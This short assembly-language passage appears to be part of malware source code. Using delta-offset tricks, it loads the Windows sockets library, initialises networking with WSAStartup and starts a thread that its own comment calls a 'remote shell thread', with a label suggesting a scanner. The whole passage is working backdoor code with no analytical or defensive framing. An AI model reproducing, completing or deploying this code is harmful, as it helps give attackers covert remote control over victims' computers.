;%%%A 0 SETT Set thread data

;get dll & APIs

	X_PUSH eax,WS2_32.DLL~
	push esp
	call delta
  	call [ebp+_LoadLibraryA]
  	X_POP
	call get_apis

;init internet

	sub esp,200h
	push esp
	push 1
	call [ebp+_WSAStartup]

;create remote shell thread

	sub eax,eax
	push eax
	push esp
	push eax
	push 0
	call @@scanner
	jmp shell_thread
  @@scanner:
	push eax
	push eax
	call [ebp+_CreateThread]

	add esp,200h+1*4
	popad
	ret
